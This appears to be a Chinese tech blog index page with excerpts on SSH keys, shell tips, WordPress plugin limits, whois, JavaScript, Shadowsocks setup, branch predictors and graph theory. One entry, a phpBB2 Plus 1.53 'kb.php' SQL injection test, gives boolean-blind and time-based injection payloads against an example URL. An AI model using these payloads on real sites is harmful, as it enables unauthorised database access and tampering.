ssh-keygen命令: 生成SSH密钥对

近来查看Digital Ocean的Droplet登陆日志,发现用作梯子节点的Droplet经常受到来自江苏连云港某IP的SSH密码穷举攻击。

于是博主关闭了该Droplet的SSH密码登录,改用密钥对登录,以杜绝穷举攻击的可能。

使用密钥对登陆,需要创建一个新的SSH密钥对(包含公钥和私钥,公钥提供给VPS服务商,私钥用于登录),我们用Linux系统自带的ssh-keygen命令来生成这个密钥对。

/root/.ssh/目录用来存储Linux系统生成的SSH密钥对,我们首先检查一下,该目录是否为空。

$ cd ~/.ssh
$ ls

若该目录里已经有(filename).pub(filename)这样的同名文件对,则代表已经有生成好的秘钥对。如果不知道已经存在的密钥对的用途,请不要随意覆盖或删除。

我们现在用ssh-keygen命令创建新的密钥对:

$ ssh-keygen

继续阅读ssh-keygen命令: 生成SSH密钥对

cd命令: 处理含空格的目录名

使用cd命令处理含空格的目录名时,在目录名中的空格前加入转义符“\”即可。

例如,当前目录中,若目标文件夹名为Google Drive,命令即为:

$ cd Google\ Drive

需注意文件夹名称大小写区分。

空格符号是类Unix系统的保留符号,有特殊含义,为与其区分,需在命令中的一般字符空格前加入转义符“\”。

破解All-in-One WP Migration上传大小限制

打开/wp-content/plugins/all-in-one-wp-migration/constants.php

199:201定义文件上传大小限制,修改数字即可,单位为Byte。

请在FTP环境下修改,WordPress自带修改器可能会导致未知语法问题。

// =================
// = Max File Size =
// =================
define( 'AI1WM_MAX_FILE_SIZE', 536870912 ); // 512MB
// =================
// = Max File Size =
// =================
define( 'AI1WM_MAX_FILE_SIZE', 4294967296 ); // 4GB

根据需求修改即可。

PHPBB2 Plus 1.53 – “kb.php” SQL注入测试

漏洞来源:

http://www.securityfocus.com/bid/38828/info

 

漏洞分析:

phpBB2 Plus的SQL注入漏洞,因未在SQL查询中过滤用户提供的数据。

攻击者可能利用此漏洞破坏网站数据库,访问或修改数据,或者近一步利用底层数据库中的潜在漏洞。

 

影响版本:

phpBB2 Plus 1.53和其他版本

 

注入链接:

http://www.example.com/kb.php?mode=cat&cat=0

 

注入类型:

Type: boolean-based blind – OR boolean-based blind – WHERE or HAVING clause (MySQL comment)

Payload: mode=cat&cat=-3951 OR 7858=7858#

Type: AND/OR time-based blind – MySQL >= 5.0.12 OR time-based blind

Payload: mode=cat&cat=-1 OR SLEEP(5)

Linux下的WHOIS命令行

Debian/Ubuntu下安装命令如下:

$ apt-get install -y whois

CentOS下安装命令如下

$ yum install -y whois

查询命令如下:

$ whois hannesgao.de

结果如下:

Domain: hannesgao.de
Nserver: ns1035.ui-dns.de
Nserver: ns1046.ui-dns.biz
Nserver: ns1046.ui-dns.com
Nserver: ns1112.ui-dns.org
Status: connect
Changed: 2017-07-06T13:14:17+02:00

[Tech-C]
Type: ROLE
Name: Hostmaster EINSUNDEINS
Organisation: 1&1 Internet AG
Address: Brauerstr. 48
PostalCode: 76135
City: Karlsruhe
CountryCode: DE
Phone: +49.7219600
Fax: +49.72191374248
Email: [email protected]
Changed: 2012-12-10T20:50:22+01:00

[Zone-C]
Type: ROLE
Name: Hostmaster EINSUNDEINS
Organisation: 1&1 Internet AG
Address: Brauerstr. 48
PostalCode: 76135
City: Karlsruhe
CountryCode: DE
Phone: +49.7219600
Fax: +49.72191374248
Email: [email protected]
Changed: 2012-12-10T20:50:22+01:00

 

JavaScript学习笔记 – 1 – 数据类型和变量

§ 0.1 – JavaScript中的变量种类


  • Number类型,代表整数和小数;
  • String类型,代表字符串;
  • Boolean类型,代表二元逻辑真伪;

§ 0.2 – JavaScript中的返回值种类


  • Undefined类型,代表未赋值(未知类型)的变量;
  • Null类型,代表已经赋值但是值为空(empty)的变量;
  • NaN(Not a Number)类型,表示“非数字”,通常返回NaN表示数字运算存在错误;

继续阅读JavaScript学习笔记 – 1 – 数据类型和变量

Google Cloud Plattform搭建自用SS服务器教程

参考文档:

  1. Shadowsocks-使用说明
  2. Shadowsocks-Troubleshooting
  3. Shadowsocks-Configuration via Config File
  4. Shadowsocks-Multiple User
  5. shadowsocks on Mac OS X 配置指南

I. 准备工作:

  1. 注册一个Google Cloud Platform一年免费试用账户
  2. 在“计算资源-VM实例”中创建一台位于asia-east1-c地区,基于Ubuntu 16.04的VM实例
  3. 在“网络-外部IP地址”中为这台VM实例配置一个外部静态IP
  4. 在“网络-防火墙规则”中添加SS Server入站端口的白名单规则,端口允许范围设置为all ports
  5. 用Google Cloud Platform自带的SSH工具连接这台VM实例

继续阅读Google Cloud Plattform搭建自用SS服务器教程

计算机结构:(m, n)-关联-分支预测器 — (m,n)-Korrelationsprädiktor

首先吐槽Rechnerstruktur这门课懒惰的教授:Prof. Dr. Wolfgang Karl。老头子Folien不改动直接改日期拿来用就不提了,Korrelationsprädiktor这么重要的考试内容居然在Folien上只给了个名字,Übungsblatt里面这个题让我查资料查了两个多小时才搞懂。

正文开始:

(m, n)-关联-分支预测器是由以下两个部分组成:

一个m位-全局分支历史寄存器 (BHR: Branch History Register)

由m位移位寄存器构成,用于记录当前跳转的前m个实际分支行为历史,每一位用来记录该分支是否实际被执行,1对应实际执行,0对应实际未执行。

一个含有2^m个条目(Eintrag)的模式历史表 (PHT: Pattern History Table),每个条目对应一个n位-简单预测器

继续阅读计算机结构:(m, n)-关联-分支预测器 — (m,n)-Korrelationsprädiktor

图论:树,图的生成树

树的定义:
如果一个无向简单图G满足以下相互等价的条件之一,那么G是一棵树:
1. G是没有回路的连通图。
2. G没有回路,但是在G内添加任意一条边,就会形成一个回路。
3. G是连通的,但是如果去掉任意一条边,就不再连通。
4. G内的任意两个顶点能被唯一路径所连通。 继续阅读图论:树,图的生成树

图论:连通,连通图,强连通图,连通分量,强连通分量概念及解析

概念:
1. 连通:在一个无向图G中,若从顶点v_i到顶点v_j有路径相连(当然从v_j到v_i也一定有路径),则称v_i和v_j是连通的。如果G是有向图,那么连接v_i和v_j的路径中所有的边都必须同向。
2. 连通图:如果图中任意两点都是连通的,那么图被称作连通图。
3. 强连通图:有向图G = (V,E)中,若对于V中任意两个不同的顶点x和y,都存在从x到y以及从y到x的路径,则称G是强连通图。
4. 连通分量:无向图G的一个极大连通子图称为G的一个连通分量(或连通分支)。连通图只有一个连通分量,即其自身;非连通的无向图有多个连通分量。

解析:
对于一个无向图,说强联通没有意义,因为此时强连通就是连通。

而对于一个有向图,它不一定是强连通的,但可以分为几个极大的强连通子图(“极大”的意思是再加入任何一个顶点就不满足强连通了)。这些子图叫做这个有向图的强连通分量。

强连通图只有一个强连通分量,即是其自身;非强连通的有向图有多个强连通分量,且多个强连通分量之间没有共享边及共享节点。

任意一个强连通分量都至少包含一个有向环。